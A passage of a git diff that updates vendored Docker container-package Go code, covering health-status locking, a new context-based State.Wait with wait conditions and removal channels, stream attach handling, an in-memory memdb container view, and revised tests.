status. +// +// Note that this takes a lock and the value may change after being read. +func (s *Health) Status() string { + s.mu.Lock() + defer s.mu.Unlock() + + // This happens when the monitor has yet to be setup. + if s.Health.Status == "" { + return types.Unhealthy + } + + return s.Health.Status +} + +// SetStatus writes the current status to the underlying health structure, +// obeying the locking semantics. +// +// Status may be set directly if another lock is used. +func (s *Health) SetStatus(new string) { + s.mu.Lock() + defer s.mu.Unlock() + + s.Health.Status = new +} + +// OpenMonitorChannel creates and returns a new monitor channel. If there +// already is one, it returns nil. func (s *Health) OpenMonitorChannel() chan struct{} { + s.mu.Lock() + defer s.mu.Unlock() + if s.stop == nil { logrus.Debug("OpenMonitorChannel") s.stop = make(chan struct{}) @@ -40,10 +68,15 @@ func (s *Health) OpenMonitorChannel() chan struct{} { // CloseMonitorChannel closes any existing monitor channel. func (s *Health) CloseMonitorChannel() { + s.mu.Lock() + defer s.mu.Unlock() + if s.stop != nil { logrus.Debug("CloseMonitorChannel: waiting for probe to stop") close(s.stop) s.stop = nil + // unhealthy when the monitor has stopped for compatibility reasons + s.Health.Status = types.Unhealthy logrus.Debug("CloseMonitorChannel done") } } diff --git a/vendor/github.com/docker/docker/container/history.go b/vendor/github.com/docker/docker/container/history.go index c80c2aa0cc..7117d9a437 100644 --- a/vendor/github.com/docker/docker/container/history.go +++ b/vendor/github.com/docker/docker/container/history.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/container" import "sort" diff --git a/vendor/github.com/docker/docker/container/memory_store.go b/vendor/github.com/docker/docker/container/memory_store.go index 706407a71c..ad4c9e20f6 100644 --- a/vendor/github.com/docker/docker/container/memory_store.go +++ b/vendor/github.com/docker/docker/container/memory_store.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/container" import ( "sync" diff --git a/vendor/github.com/docker/docker/container/memory_store_test.go b/vendor/github.com/docker/docker/container/memory_store_test.go index f81738fae1..09a8f27e07 100644 --- a/vendor/github.com/docker/docker/container/memory_store_test.go +++ b/vendor/github.com/docker/docker/container/memory_store_test.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/container" import ( "testing" @@ -62,7 +62,7 @@ func TestListContainers(t *testing.T) { t.Fatalf("expected list size 2, got %v", len(list)) } if list[0].ID != "id2" { - t.Fatalf("expected older container to be first, got %v", list[0].ID) + t.Fatalf("expected id2, got %v", list[0].ID) } } @@ -101,6 +101,6 @@ func TestApplyAllContainer(t *testing.T) { t.Fatal("expected container to not be nil") } if cont.ID != "newID" { - t.Fatalf("expected newID, got %v", cont) + t.Fatalf("expected newID, got %v", cont.ID) } } diff --git a/vendor/github.com/docker/docker/container/monitor.go b/vendor/github.com/docker/docker/container/monitor.go index f05e72b25f..1735e3487e 100644 --- a/vendor/github.com/docker/docker/container/monitor.go +++ b/vendor/github.com/docker/docker/container/monitor.go @@ -1,9 +1,9 @@ -package container +package container // import "github.com/docker/docker/container" import ( "time" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) const ( diff --git a/vendor/github.com/docker/docker/container/mounts_unix.go b/vendor/github.com/docker/docker/container/mounts_unix.go index c52abed2dc..62f4441dce 100644 --- a/vendor/github.com/docker/docker/container/mounts_unix.go +++ b/vendor/github.com/docker/docker/container/mounts_unix.go @@ -1,6 +1,6 @@ // +build !windows -package container +package container // import "github.com/docker/docker/container" // Mount contains information for a mount operation. type Mount struct { diff --git a/vendor/github.com/docker/docker/container/mounts_windows.go b/vendor/github.com/docker/docker/container/mounts_windows.go index 01b327f788..8f27e88067 100644 --- a/vendor/github.com/docker/docker/container/mounts_windows.go +++ b/vendor/github.com/docker/docker/container/mounts_windows.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/container" // Mount contains information for a mount operation. type Mount struct { diff --git a/vendor/github.com/docker/docker/container/state.go b/vendor/github.com/docker/docker/container/state.go index 4dd2ecec69..7c2a1ec81c 100644 --- a/vendor/github.com/docker/docker/container/state.go +++ b/vendor/github.com/docker/docker/container/state.go @@ -1,12 +1,12 @@ -package container +package container // import "github.com/docker/docker/container" import ( + "context" + "errors" "fmt" "sync" "time" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/go-units" ) @@ -16,8 +16,10 @@ import ( // functions defined against State to run against Container. type State struct { sync.Mutex - // FIXME: Why do we have both paused and running if a - // container cannot be paused and running at the same time? + // Note that `Running` and `Paused` are not mutually exclusive: + // When pausing a container (on Linux), the cgroups freezer is used to suspend + // all processes in the container. Freezing the process requires the process to + // be running. As a result, paused containers are both `Running` _and_ `Paused`. Running bool Paused bool Restarting bool @@ -26,43 +28,40 @@ type State struct { Dead bool Pid int ExitCodeValue int `json:"ExitCode"` - ErrorMsg string `json:"Error"` // contains last known error when starting the container + ErrorMsg string `json:"Error"` // contains last known error during container start, stop, or remove StartedAt time.Time FinishedAt time.Time - waitChan chan struct{} Health *Health + + waitStop chan struct{} + waitRemove chan struct{} } -// StateStatus is used to return an error type implementing both -// exec.ExitCode and error. +// StateStatus is used to return container wait results. +// Implements exec.ExitCode interface. // This type is needed as State include a sync.Mutex field which make // copying it unsafe. type StateStatus struct { exitCode int - error string -} - -func newStateStatus(ec int, err string) *StateStatus { - return &StateStatus{ - exitCode: ec, - error: err, - } + err error } // ExitCode returns current exitcode for the state. -func (ss *StateStatus) ExitCode() int { - return ss.exitCode +func (s StateStatus) ExitCode() int { + return s.exitCode } -// Error returns current error for the state. -func (ss *StateStatus) Error() string { - return ss.error +// Err returns current error for the state. Returns nil if the container had +// exited on its own. +func (s StateStatus) Err() error { + return s.err } // NewState creates a default state object with a fresh channel for state changes. func NewState() *State { return &State{ - waitChan: make(chan struct{}), + waitStop: make(chan struct{}), + waitRemove: make(chan struct{}), } } @@ -102,15 +101,6 @@ func (s *State) String() string { return fmt.Sprintf("Exited (%d) %s ago", s.ExitCodeValue, units.HumanDuration(time.Now().UTC().Sub(s.FinishedAt))) } -// HealthString returns a single string to describe health status. -func (s *State) HealthString() string { - if s.Health == nil { - return types.NoHealthcheck - } - - return s.Health.String() -} - // IsValidHealthString checks if the provided string is a valid container health status or not. func IsValidHealthString(s string) bool { return s == types.Starting || @@ -160,66 +150,89 @@ func IsValidStateString(s string) bool { return true } -func wait(waitChan <-chan struct{}, timeout time.Duration) error { - if timeout < 0 { - <-waitChan - return nil - } - select { - case <-time.After(timeout): - return fmt.Errorf("Timed out: %v", timeout) - case <-waitChan: - return nil - } -} +// WaitCondition is an enum type for different states to wait for. +type WaitCondition int + +// Possible WaitCondition Values. +// +// WaitConditionNotRunning (default) is used to wait for any of the non-running +// states: "created", "exited", "dead", "removing", or "removed". +// +// WaitConditionNextExit is used to wait for the next time the state changes +// to a non-running state. If the state is currently "created" or "exited", +// this would cause Wait() to block until either the container runs and exits +// or is removed. +// +// WaitConditionRemoved is used to wait for the container to be removed. +const ( + WaitConditionNotRunning WaitCondition = iota + WaitConditionNextExit + WaitConditionRemoved +) -// WaitStop waits until state is stopped. If state already stopped it returns -// immediately. If you want wait forever you must supply negative timeout. -// Returns exit code, that was passed to SetStopped -func (s *State) WaitStop(timeout time.Duration) (int, error) { - s.Lock() - if !s.Running { - exitCode := s.ExitCodeValue - s.Unlock() - return exitCode, nil - } - waitChan := s.waitChan - s.Unlock() - if err := wait(waitChan, timeout); err != nil { - return -1, err - } +// Wait waits until the container is in a certain state indicated by the given +// condition. A context must be used for cancelling the request, controlling +// timeouts, and avoiding goroutine leaks. Wait must be called without holding +// the state lock. Returns a channel from which the caller will receive the +// result. If the container exited on its own, the result's Err() method will +// be nil and its ExitCode() method will return the container's exit code, +// otherwise, the results Err() method will return an error indicating why the +// wait operation failed. +func (s *State) Wait(ctx context.Context, condition WaitCondition) <-chan StateStatus { s.Lock() defer s.Unlock() - return s.ExitCode(), nil -} -// WaitWithContext waits for the container to stop. Optional context can be -// passed for canceling the request. -func (s *State) WaitWithContext(ctx context.Context) error { - // todo(tonistiigi): make other wait functions use this - s.Lock() - if !s.Running { - state := newStateStatus(s.ExitCode(), s.Error()) - defer s.Unlock() - if state.ExitCode() == 0 { - return nil + if condition == WaitConditionNotRunning && !s.Running { + // Buffer so we can put it in the channel now. + resultC := make(chan StateStatus, 1) + + // Send the current status. + resultC <- StateStatus{ + exitCode: s.ExitCode(), + err: s.Err(), } - return state + + return resultC } - waitChan := s.waitChan - s.Unlock() - select { - case <-waitChan: + + // If we are waiting only for removal, the waitStop channel should + // remain nil and block forever. + var waitStop chan struct{} + if condition < WaitConditionRemoved { + waitStop = s.waitStop + } + + // Always wait for removal, just in case the container gets removed + // while it is still in a "created" state, in which case it is never + // actually stopped. + waitRemove := s.waitRemove + + resultC := make(chan StateStatus) + + go func() { + select { + case <-ctx.Done(): + // Context timeout or cancellation. + resultC <- StateStatus{ + exitCode: -1, + err: ctx.Err(), + } + return + case <-waitStop: + case <-waitRemove: + } + s.Lock() - state := newStateStatus(s.ExitCode(), s.Error()) - s.Unlock() - if state.ExitCode() == 0 { - return nil + result := StateStatus{ + exitCode: s.ExitCode(), + err: s.Err(), } - return state - case <-ctx.Done(): - return ctx.Err() - } + s.Unlock() + + resultC <- result + }() + + return resultC } // IsRunning returns whether the running flag is set. Used by Container to check whether a container is running. @@ -253,8 +266,12 @@ func (s *State) SetExitCode(ec int) { // SetRunning sets the state of the container to "running". func (s *State) SetRunning(pid int, initial bool) { s.ErrorMsg = "" + s.Paused = false s.Running = true s.Restarting = false + if initial { + s.Paused = false + } s.ExitCodeValue = 0 s.Pid = pid if initial { @@ -268,10 +285,15 @@ func (s *State) SetStopped(exitStatus *ExitStatus) { s.Paused = false s.Restarting = false s.Pid = 0 - s.FinishedAt = time.Now().UTC() - s.setFromExitStatus(exitStatus) - close(s.waitChan) // fire waiters for stop - s.waitChan = make(chan struct{}) + if exitStatus.ExitedAt.IsZero() { + s.FinishedAt = time.Now().UTC() + } else { + s.FinishedAt = exitStatus.ExitedAt + } + s.ExitCodeValue = exitStatus.ExitCode + s.OOMKilled = exitStatus.OOMKilled + close(s.waitStop) // fire waiters for stop + s.waitStop = make(chan struct{}) } // SetRestarting sets the container state to "restarting" without locking. @@ -281,18 +303,23 @@ func (s *State) SetRestarting(exitStatus *ExitStatus) { // all the checks in docker around rm/stop/etc s.Running = true s.Restarting = true + s.Paused = false s.Pid = 0 s.FinishedAt = time.Now().UTC() - s.setFromExitStatus(exitStatus) - close(s.waitChan) // fire waiters for stop - s.waitChan = make(chan struct{}) + s.ExitCodeValue = exitStatus.ExitCode + s.OOMKilled = exitStatus.OOMKilled + close(s.waitStop) // fire waiters for stop + s.waitStop = make(chan struct{}) } // SetError sets the container's error state. This is useful when we want to // know the error that occurred when container transits to another state // when inspecting it func (s *State) SetError(err error) { - s.ErrorMsg = err.Error() + s.ErrorMsg = "" + if err != nil { + s.ErrorMsg = err.Error() + } } // IsPaused returns whether the container is paused or not. @@ -330,6 +357,15 @@ func (s *State) ResetRemovalInProgress() { s.Unlock() } +// IsRemovalInProgress returns whether the RemovalInProgress flag is set. +// Used by Container to check whether a container is being removed. +func (s *State) IsRemovalInProgress() bool { + s.Lock() + res := s.RemovalInProgress + s.Unlock() + return res +} + // SetDead sets the container state to "dead" func (s *State) SetDead() { s.Lock() @@ -337,7 +373,37 @@ func (s *State) SetDead() { s.Unlock() } -// Error returns current error for the state. -func (s *State) Error() string { - return s.ErrorMsg +// IsDead returns whether the Dead flag is set. Used by Container to check whether a container is dead. +func (s *State) IsDead() bool { + s.Lock() + res := s.Dead + s.Unlock() + return res +} + +// SetRemoved assumes this container is already in the "dead" state and +// closes the internal waitRemove channel to unblock callers waiting for a +// container to be removed. +func (s *State) SetRemoved() { + s.SetRemovalError(nil) +} + +// SetRemovalError is to be called in case a container remove failed. +// It sets an error and closes the internal waitRemove channel to unblock +// callers waiting for the container to be removed. +func (s *State) SetRemovalError(err error) { + s.SetError(err) + s.Lock() + close(s.waitRemove) // Unblock those waiting on remove. + // Recreate the channel so next ContainerWait will work + s.waitRemove = make(chan struct{}) + s.Unlock() +} + +// Err returns an error if there is one. +func (s *State) Err() error { + if s.ErrorMsg != "" { + return errors.New(s.ErrorMsg) + } + return nil } diff --git a/vendor/github.com/docker/docker/container/state_solaris.go b/vendor/github.com/docker/docker/container/state_solaris.go deleted file mode 100644 index 1229650efa..0000000000 --- a/vendor/github.com/docker/docker/container/state_solaris.go +++ /dev/null @@ -1,7 +0,0 @@ -package container - -// setFromExitStatus is a platform specific helper function to set the state -// based on the ExitStatus structure. -func (s *State) setFromExitStatus(exitStatus *ExitStatus) { - s.ExitCodeValue = exitStatus.ExitCode -} diff --git a/vendor/github.com/docker/docker/container/state_test.go b/vendor/github.com/docker/docker/container/state_test.go index c9a7bb4b7b..4ad3c805ed 100644 --- a/vendor/github.com/docker/docker/container/state_test.go +++ b/vendor/github.com/docker/docker/container/state_test.go @@ -1,7 +1,7 @@ -package container +package container // import "github.com/docker/docker/container" import ( - "sync/atomic" + "context" "testing" "time" @@ -30,31 +30,63 @@ func TestIsValidHealthString(t *testing.T) { func TestStateRunStop(t *testing.T) { s := NewState() - for i := 1; i < 3; i++ { // full lifecycle two times + + // Begin another wait with WaitConditionRemoved. It should complete + // within 200 milliseconds. + ctx, cancel := context.WithTimeout(context.Background(), 200*time.Millisecond) + defer cancel() + removalWait := s.Wait(ctx, WaitConditionRemoved) + + // Full lifecycle two times. + for i := 1; i <= 2; i++ { + // A wait with WaitConditionNotRunning should return + // immediately since the state is now either "created" (on the + // first iteration) or "exited" (on the second iteration). It + // shouldn't take more than 50 milliseconds. + ctx, cancel := context.WithTimeout(context.Background(), 50*time.Millisecond) + defer cancel() + // Expectx exit code to be i-1 since it should be the exit + // code from the previous loop or 0 for the created state. + if status := <-s.Wait(ctx, WaitConditionNotRunning); status.ExitCode() != i-1 { + t.Fatalf("ExitCode %v, expected %v, err %q", status.ExitCode(), i-1, status.Err()) + } + + // A wait with WaitConditionNextExit should block until the + // container has started and exited. It shouldn't take more + // than 100 milliseconds. + ctx, cancel = context.WithTimeout(context.Background(), 100*time.Millisecond) + defer cancel() + initialWait := s.Wait(ctx, WaitConditionNextExit) + + // Set the state to "Running". s.Lock() - s.SetRunning(i+100, false) + s.SetRunning(i, true) s.Unlock() + // Assert desired state. if !s.IsRunning() { t.Fatal("State not running") } - if s.Pid != i+100 { - t.Fatalf("Pid %v, expected %v", s.Pid, i+100) + if s.Pid != i { + t.Fatalf("Pid %v, expected %v", s.Pid, i) } if s.ExitCode() != 0 { t.Fatalf("ExitCode %v, expected 0", s.ExitCode()) } - stopped := make(chan struct{}) - var exit int64 - go func() { - exitCode, _ := s.WaitStop(-1 * time.Second) - atomic.StoreInt64(&exit, int64(exitCode)) - close(stopped) - }() + // Now that it's running, a wait with WaitConditionNotRunning + // should block until we stop the container. It shouldn't take + // more than 100 milliseconds. + ctx, cancel = context.WithTimeout(context.Background(), 100*time.Millisecond) + defer cancel() + exitWait := s.Wait(ctx, WaitConditionNotRunning) + + // Set the state to "Exited". s.Lock() s.SetStopped(&ExitStatus{ExitCode: i}) s.Unlock() + + // Assert desired state. if s.IsRunning() { t.Fatal("State is running") } @@ -64,50 +96,97 @@ func TestStateRunStop(t *testing.T) { if s.Pid != 0 { t.Fatalf("Pid %v, expected 0", s.Pid) } - select { - case <-time.After(100 * time.Millisecond): - t.Fatal("Stop callback doesn't fire in 100 milliseconds") - case <-stopped: - t.Log("Stop callback fired") - } - exitCode := int(atomic.LoadInt64(&exit)) - if exitCode != i { - t.Fatalf("ExitCode %v, expected %v", exitCode, i) + + // Receive the initialWait result. + if status := <-initialWait; status.ExitCode() != i { + t.Fatalf("ExitCode %v, expected %v, err %q", status.ExitCode(), i, status.Err()) } - if exitCode, err := s.WaitStop(-1 * time.Second); err != nil || exitCode != i { - t.Fatalf("WaitStop returned exitCode: %v, err: %v, expected exitCode: %v, err: %v", exitCode, err, i, nil) + + // Receive the exitWait result. + if status := <-exitWait; status.ExitCode() != i { + t.Fatalf("ExitCode %v, expected %v, err %q", status.ExitCode(), i, status.Err()) } } + + // Set the state to dead and removed. + s.SetDead() + s.SetRemoved() + + // Wait for removed status or timeout. + if status := <-removalWait; status.ExitCode() != 2 { + // Should have the final exit code from the loop. + t.Fatalf("Removal wait exitCode %v, expected %v, err %q", status.ExitCode(), 2, status.Err()) + } } func TestStateTimeoutWait(t *testing.T) { s := NewState() - stopped := make(chan struct{}) - go func() { - s.WaitStop(100 * time.Millisecond) - close(stopped) - }() + + s.Lock() + s.SetRunning(0, true) + s.Unlock() + + // Start a wait with a timeout. + ctx, cancel := context.WithTimeout(context.Background(), 100*time.Millisecond) + defer cancel() + waitC := s.Wait(ctx, WaitConditionNotRunning) + + // It should timeout *before* this 200ms timer does. select { case <-time.After(200 * time.Millisecond): t.Fatal("Stop callback doesn't fire in 200 milliseconds") - case <-stopped: + case status := <-waitC: t.Log("Stop callback fired") + // Should be a timeout error. + if status.Err() == nil { + t.Fatal("expected timeout error, got nil") + } + if status.ExitCode() != -1 { + t.Fatalf("expected exit code %v, got %v", -1, status.ExitCode()) + } } s.Lock() - s.SetStopped(&ExitStatus{ExitCode: 1}) + s.SetStopped(&ExitStatus{ExitCode: 0}) s.Unlock() - stopped = make(chan struct{}) - go func() { - s.WaitStop(100 * time.Millisecond) - close(stopped) - }() + // Start another wait with a timeout. This one should return + // immediately. + ctx, cancel = context.WithTimeout(context.Background(), 100*time.Millisecond) + defer cancel() + waitC = s.Wait(ctx, WaitConditionNotRunning) + select { case <-time.After(200 * time.Millisecond): - t.Fatal("Stop callback doesn't fire in 100 milliseconds") - case <-stopped: + t.Fatal("Stop callback doesn't fire in 200 milliseconds") + case status := <-waitC: t.Log("Stop callback fired") + if status.ExitCode() != 0 { + t.Fatalf("expected exit code %v, got %v, err %q", 0, status.ExitCode(), status.Err()) + } } +} +func TestIsValidStateString(t *testing.T) { + states := []struct { + state string + expected bool + }{ + {"paused", true}, + {"restarting", true}, + {"running", true}, + {"dead", true}, + {"start", false}, + {"created", true}, + {"exited", true}, + {"removing", true}, + {"stop", false}, + } + + for _, s := range states { + v := IsValidStateString(s.state) + if v != s.expected { + t.Fatalf("Expected %t, but got %t", s.expected, v) + } + } } diff --git a/vendor/github.com/docker/docker/container/state_unix.go b/vendor/github.com/docker/docker/container/state_unix.go deleted file mode 100644 index a2fa5afc28..0000000000 --- a/vendor/github.com/docker/docker/container/state_unix.go +++ /dev/null @@ -1,10 +0,0 @@ -// +build linux freebsd - -package container - -// setFromExitStatus is a platform specific helper function to set the state -// based on the ExitStatus structure. -func (s *State) setFromExitStatus(exitStatus *ExitStatus) { - s.ExitCodeValue = exitStatus.ExitCode - s.OOMKilled = exitStatus.OOMKilled -} diff --git a/vendor/github.com/docker/docker/container/state_windows.go b/vendor/github.com/docker/docker/container/state_windows.go deleted file mode 100644 index 1229650efa..0000000000 --- a/vendor/github.com/docker/docker/container/state_windows.go +++ /dev/null @@ -1,7 +0,0 @@ -package container - -// setFromExitStatus is a platform specific helper function to set the state -// based on the ExitStatus structure. -func (s *State) setFromExitStatus(exitStatus *ExitStatus) { - s.ExitCodeValue = exitStatus.ExitCode -} diff --git a/vendor/github.com/docker/docker/container/store.go b/vendor/github.com/docker/docker/container/store.go index 042fb1a349..3af0389856 100644 --- a/vendor/github.com/docker/docker/container/store.go +++ b/vendor/github.com/docker/docker/container/store.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/container" // StoreFilter defines a function to filter // container in the store. diff --git a/vendor/github.com/docker/docker/container/stream/attach.go b/vendor/github.com/docker/docker/container/stream/attach.go new file mode 100644 index 0000000000..1366dcb499 --- /dev/null +++ b/vendor/github.com/docker/docker/container/stream/attach.go @@ -0,0 +1,175 @@ +package stream // import "github.com/docker/docker/container/stream" + +import ( + "context" + "io" + + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/term" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sync/errgroup" +) + +var defaultEscapeSequence = []byte{16, 17} // ctrl-p, ctrl-q + +// AttachConfig is the config struct used to attach a client to a stream's stdio +type AttachConfig struct { + // Tells the attach copier that the stream's stdin is a TTY and to look for + // escape sequences in stdin to detach from the stream. + // When true the escape sequence is not passed to the underlying stream + TTY bool + // Specifies the detach keys the client will be using + // Only useful when `TTY` is true + DetachKeys []byte + + // CloseStdin signals that once done, stdin for the attached stream should be closed + // For example, this would close the attached container's stdin. + CloseStdin bool + + // UseStd* indicate whether the client has requested to be connected to the + // given stream or not. These flags are used instead of checking Std* != nil + // at points before the client streams Std* are wired up. + UseStdin, UseStdout, UseStderr bool + + // CStd* are the streams directly connected to the container + CStdin io.WriteCloser + CStdout, CStderr io.ReadCloser + + // Provide client streams to wire up to + Stdin io.ReadCloser + Stdout, Stderr io.Writer +} + +// AttachStreams attaches the container's streams to the AttachConfig +func (c *Config) AttachStreams(cfg *AttachConfig) { + if cfg.UseStdin { + cfg.CStdin = c.StdinPipe() + } + + if cfg.UseStdout { + cfg.CStdout = c.StdoutPipe() + } + + if cfg.UseStderr { + cfg.CStderr = c.StderrPipe() + } +} + +// CopyStreams starts goroutines to copy data in and out to/from the container +func (c *Config) CopyStreams(ctx context.Context, cfg *AttachConfig) <-chan error { + var group errgroup.Group + + // Connect stdin of container to the attach stdin stream. + if cfg.Stdin != nil { + group.Go(func() error { + logrus.Debug("attach: stdin: begin") + defer logrus.Debug("attach: stdin: end") + + defer func() { + if cfg.CloseStdin && !cfg.TTY { + cfg.CStdin.Close() + } else { + // No matter what, when stdin is closed (io.Copy unblock), close stdout and stderr + if cfg.CStdout != nil { + cfg.CStdout.Close() + } + if cfg.CStderr != nil { + cfg.CStderr.Close() + } + } + }() + + var err error + if cfg.TTY { + _, err = copyEscapable(cfg.CStdin, cfg.Stdin, cfg.DetachKeys) + } else { + _, err = pools.Copy(cfg.CStdin, cfg.Stdin) + } + if err == io.ErrClosedPipe { + err = nil + } + if err != nil { + logrus.WithError(err).Debug("error on attach stdin") + return errors.Wrap(err, "error on attach stdin") + } + return nil + }) + } + + attachStream := func(name string, stream io.Writer, streamPipe io.ReadCloser) error { + logrus.Debugf("attach: %s: begin", name) + defer logrus.Debugf("attach: %s: end", name) + defer func() { + // Make sure stdin gets closed + if cfg.Stdin != nil { + cfg.Stdin.Close() + } + streamPipe.Close() + }() + + _, err := pools.Copy(stream, streamPipe) + if err == io.ErrClosedPipe { + err = nil + } + if err != nil { + logrus.WithError(err).Debugf("attach: %s", name) + return errors.Wrapf(err, "error attaching %s stream", name) + } + return nil + } + + if cfg.Stdout != nil { + group.Go(func() error { + return attachStream("stdout", cfg.Stdout, cfg.CStdout) + }) + } + if cfg.Stderr != nil { + group.Go(func() error { + return attachStream("stderr", cfg.Stderr, cfg.CStderr) + }) + } + + errs := make(chan error, 1) + go func() { + defer logrus.Debug("attach done") + groupErr := make(chan error, 1) + go func() { + groupErr <- group.Wait() + }() + select { + case <-ctx.Done(): + // close all pipes + if cfg.CStdin != nil { + cfg.CStdin.Close() + } + if cfg.CStdout != nil { + cfg.CStdout.Close() + } + if cfg.CStderr != nil { + cfg.CStderr.Close() + } + + // Now with these closed, wait should return. + if err := group.Wait(); err != nil { + errs <- err + return + } + errs <- ctx.Err() + case err := <-groupErr: + errs <- err + } + }() + + return errs +} + +func copyEscapable(dst io.Writer, src io.ReadCloser, keys []byte) (written int64, err error) { + if len(keys) == 0 { + keys = defaultEscapeSequence + } + pr := term.NewEscapeProxy(src, keys) + defer src.Close() + + return pools.Copy(dst, pr) +} diff --git a/vendor/github.com/docker/docker/container/stream/streams.go b/vendor/github.com/docker/docker/container/stream/streams.go index 79f366afda..d81867c1da 100644 --- a/vendor/github.com/docker/docker/container/stream/streams.go +++ b/vendor/github.com/docker/docker/container/stream/streams.go @@ -1,4 +1,4 @@ -package stream +package stream // import "github.com/docker/docker/container/stream" import ( "fmt" @@ -7,11 +7,11 @@ import ( "strings" "sync" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/libcontainerd" + "github.com/containerd/containerd/cio" "github.com/docker/docker/pkg/broadcaster" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/pools" + "github.com/sirupsen/logrus" ) // Config holds information about I/O streams managed together. @@ -62,6 +62,7 @@ func (c *Config) StdinPipe() io.WriteCloser { // StdoutPipe creates a new io.ReadCloser with an empty bytes pipe. // It adds this new out pipe to the Stdout broadcaster. +// This will block stdout if unconsumed. func (c *Config) StdoutPipe() io.ReadCloser { bytesPipe := ioutils.NewBytesPipe() c.stdout.Add(bytesPipe) @@ -70,6 +71,7 @@ func (c *Config) StdoutPipe() io.ReadCloser { // StderrPipe creates a new io.ReadCloser with an empty bytes pipe. // It adds this new err pipe to the Stderr broadcaster. +// This will block stderr if unconsumed. func (c *Config) StderrPipe() io.ReadCloser { bytesPipe := ioutils.NewBytesPipe() c.stderr.Add(bytesPipe) @@ -112,13 +114,14 @@ func (c *Config) CloseStreams() error { } // CopyToPipe connects streamconfig with a libcontainerd.IOPipe -func (c *Config) CopyToPipe(iop libcontainerd.IOPipe) { - copyFunc := func(w io.Writer, r io.Reader) { +func (c *Config) CopyToPipe(iop *cio.DirectIO) { + copyFunc := func(w io.Writer, r io.ReadCloser) { c.Add(1) go func() { if _, err := pools.Copy(w, r); err != nil { - logrus.Errorf("stream copy error: %+v", err) + logrus.Errorf("stream copy error: %v", err) } + r.Close() c.Done() }() } @@ -135,7 +138,7 @@ func (c *Config) CopyToPipe(iop libcontainerd.IOPipe) { go func() { pools.Copy(iop.Stdin, stdin) if err := iop.Stdin.Close(); err != nil { - logrus.Warnf("failed to close stdin: %+v", err) + logrus.Warnf("failed to close stdin: %v", err) } }() } diff --git a/vendor/github.com/docker/docker/container/view.go b/vendor/github.com/docker/docker/container/view.go new file mode 100644 index 0000000000..b631499412 --- /dev/null +++ b/vendor/github.com/docker/docker/container/view.go @@ -0,0 +1,494 @@ +package container // import "github.com/docker/docker/container" + +import ( + "errors" + "fmt" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + "github.com/docker/go-connections/nat" + "github.com/hashicorp/go-memdb" + "github.com/sirupsen/logrus" +) + +const ( + memdbContainersTable = "containers" + memdbNamesTable = "names" + memdbIDIndex = "id" + memdbContainerIDIndex = "containerid" +) + +var ( + // ErrNameReserved is an error which is returned when a name is requested to be reserved that already is reserved + ErrNameReserved = errors.New("name is reserved") + // ErrNameNotReserved is an error which is returned when trying to find a name that is not reserved + ErrNameNotReserved = errors.New("name is not reserved") +) + +// Snapshot is a read only view for Containers. It holds all information necessary to serve container queries in a +// versioned ACID in-memory store. +type Snapshot struct { + types.Container + + // additional info queries need to filter on + // preserve nanosec resolution for queries + CreatedAt time.Time + StartedAt time.Time + Name string + Pid int + ExitCode int + Running bool + Paused bool + Managed bool + ExposedPorts nat.PortSet + PortBindings nat.PortSet + Health string + HostConfig struct { + Isolation string + } +} + +// nameAssociation associates a container id with a name. +type nameAssociation struct { + // name is the name to associate. Note that name is the primary key + // ("id" in memdb). + name string + containerID string +} + +// ViewDB provides an in-memory transactional (ACID) container Store +type ViewDB interface { + Snapshot() View + Save(*Container) error + Delete(*Container) error + + ReserveName(name, containerID string) error + ReleaseName(name string) error +} + +// View can be used by readers to avoid locking +type View interface { + All() ([]Snapshot, error) + Get(id string) (*Snapshot, error) + + GetID(name string) (string, error) + GetAllNames() map[string][]string +} + +var schema = &memdb.DBSchema{ + Tables: map[string]*memdb.TableSchema{ + memdbContainersTable: { + Name: memdbContainersTable, + Indexes: map[string]*memdb.IndexSchema{ + memdbIDIndex: { + Name: memdbIDIndex, + Unique: true, + Indexer: &containerByIDIndexer{}, + }, + }, + }, + memdbNamesTable: { + Name: memdbNamesTable, + Indexes: map[string]*memdb.IndexSchema{ + // Used for names, because "id" is the primary key in memdb. + memdbIDIndex: { + Name: memdbIDIndex, + Unique: true, + Indexer: &namesByNameIndexer{}, + }, + memdbContainerIDIndex: { + Name: memdbContainerIDIndex, + Indexer: &namesByContainerIDIndexer{}, + }, + }, + }, + }, +} + +type memDB struct { + store *memdb.MemDB +} + +// NoSuchContainerError indicates that the container wasn't found in the +// database. +type NoSuchContainerError struct { + id string +} + +// Error satisfies the error interface. +func (e NoSuchContainerError) Error() string { + return "no such container " + e.id +} + +// NewViewDB provides the default implementation, with the default schema +func NewViewDB() (ViewDB, error) { + store, err := memdb.NewMemDB(schema) + if err != nil { + return nil, err + } + return &memDB{store: store}, nil +} + +// Snapshot provides a consistent read-only View of the database +func (db *memDB) Snapshot() View { + return &memdbView{ + txn: db.store.Txn(false), + } +} + +func (db *memDB) withTxn(cb func(*memdb.Txn) error) error { + txn := db.store.Txn(true) + err := cb(txn) + if err != nil { + txn.Abort() + return err + } + txn.Commit() + return nil +} + +// Save atomically updates the in-memory store state for a Container. +// Only read only (deep) copies of containers may be passed in. +func (db *memDB) Save(c *Container) error { + return db.withTxn(func(txn *memdb.Txn) error { + return txn.Insert(memdbContainersTable, c) + }) +} + +// Delete removes an item by ID +func (db *memDB) Delete(c *Container) error { + return db.withTxn(func(txn *memdb.Txn) error { + view := &memdbView{txn: txn} + names := view.getNames(c.ID) + + for _, name := range names { + txn.Delete(memdbNamesTable, nameAssociation{name: name}) + } + + // Ignore error - the container may not actually exist in the + // db, but we still need to clean up associated names. + txn.Delete(memdbContainersTable, NewBaseContainer(c.ID, c.Root)) + return nil + }) +} + +// ReserveName registers a container ID to a name +// ReserveName is idempotent +// Attempting to reserve a container ID to a name that already exists results in an `ErrNameReserved` +// A name reservation is globally unique +func (db *memDB) ReserveName(name, containerID string) error { + return db.withTxn(func(txn *memdb.Txn) error { + s, err := txn.First(memdbNamesTable, memdbIDIndex, name) + if err != 